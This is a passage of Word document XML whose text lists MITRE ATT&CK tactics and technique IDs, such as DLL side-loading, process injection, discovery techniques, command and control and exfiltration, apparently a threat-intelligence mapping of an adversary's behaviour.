          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A9F00"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22028F0E"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T1547.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Helper DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736CD92"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1078.003', 'T1547.001', 'T1543.003', 'T1574.002', 'T1055.001', 'T1547.004']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7950CC"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D9E7F"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C560F54"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96F543"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764BECD2"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T1055.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Dynamic-link Library Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C91A44"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T1547.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Helper DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130184CA"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1070.004', 'T1078.003', 'T1036.005', 'T1027.003', 'T1574.002', 'T1055.001', 'T1027', 'T1564.001', 'T1221', 'T1140']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4FE3F1"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE874FB"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCB89E"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A373C4"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T1027.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D1579"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D92C2"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T1055.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Dynamic-link Library Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603E11D"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1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDFD7B3"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T1564.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Files and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62B069"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1221 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Template Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816A9CE" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="0035652A" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="0035652A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035652A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035652A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035652A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035652A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687CE879"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF6358"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1049', 'T1016', 'T1082', 'T1083', 'T1518', 'T1033', 'T1135', 'T1046', 'T1057', 'T1518.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2E455"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE8805"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774D41A"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1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9AA55"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50086442"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1518 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFB0899"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585C080"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1135 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2736F67F"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1046 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B33B1"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171AC0B4"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T1518.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Software Discovery&gt;:Security Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F8418"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1091']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035B813C"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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68799FA7"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1119']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEEC71A"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1119 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58E679"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1071.004', 'T1573', 'T1132.001', 'T1105', 'T1071.001', 'T1573.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E6202"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T1071.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152CD74"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1573 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Encrypted Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0B61A"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T1132.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076F0EA"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1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E052962"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T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37116F6A"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T1573.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Encrypted Channel&gt;:Asymmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC150B" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="007E02B4"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1052.001', 'T1020']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0112D"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1052.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Physical Medium&gt;:Exfiltration over USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFBE72" w14:textId="77777777" w:rsidR="007E02B4" w:rsidRPr="007E02B4" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1020 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94E9CC" w14:textId="0DC9DFC1" w:rsidR="007E02B4" w:rsidRPr="005935F8" w:rsidRDefault="007E02B4" w:rsidP="007E02B4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E02B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F635D" w14:textId="77777777" w:rsidR="00324B94" w:rsidRDefault="00324B94" w:rsidP="00324B94">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
